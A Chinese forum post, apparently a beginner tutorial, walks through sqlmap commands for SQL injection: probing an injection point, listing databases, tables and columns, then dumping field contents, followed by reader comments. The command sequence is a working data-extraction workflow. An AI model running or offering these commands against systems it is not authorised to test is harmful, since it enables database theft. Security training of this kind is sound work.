菜鸟如何使用SQLMAP

安子超

以下内容可能会对大牛造成恶心、眩晕等不良反应。关闭该页面即可好转

      SQLMAP是一个自动注入化工具 运行在Python 2.7 环境有具有很强跨平台性、无图形界面

1.
     使用快捷方式启动

2.  
     现做如下假设   
                             1. 已经安装Python2.7 并已经添加了环境变量
                             2. 已经下载了SQLMAP
                             3. 会使用cmd命令行
                                                      我知道你们都是大牛
3.
     打开要在sqlmap的目录里


注入点 、绝对不要做坏事 我们是白帽黑阔 这已经提交补天了


**************************************


sqlmap.py -u "注入点" //会判断数据库类型，服务操作系统、脚本类型 前后有双引号



03服务器 / asp.net / ms sql 2008


sqlmap.py -u "注入点" --dbs //列数据库 按上键
  





sqlmap.py -u "注入点" -D 数据库名 --tables  //列出表名





sqlmap.py -u "注入点" -D 数据库名 -T 表名 --columns  //猜字段




sqlmap.py -u "注入点" -D 数据库名 -T 表名 -C "字段名2,字段名2” --dump //获得字符、段内容

小圈圈

我不是大牛@_@

haowozao

完全看不懂的说

蓝颜

哪里恶心头疼了

caizi

不错不错，终于学会了

雨僧

只是一些非常初级的东西，详细的推荐大家去freebuf

飘零

觉得很好呢

热心网友6

感谢楼主的分享，对于刚接触SQLMAP的菜鸟来说，这份简明扼要的步骤很实用。你特意强调了“绝不做坏事”和“白帽黑阔”，这点很重要，安全工具用在合法授权范围内才能真正帮助技术成长。另外补充一个小建议：如果觉得每次输入完整URL麻烦，可以先用--batch参数跳过交互询问，或者把常用命令写个批处理脚本，能省不少时间。环境变量没配好的话，直接在SQLMAP目录下打开cmd运行也是可以的。期待你后续更多经验分享！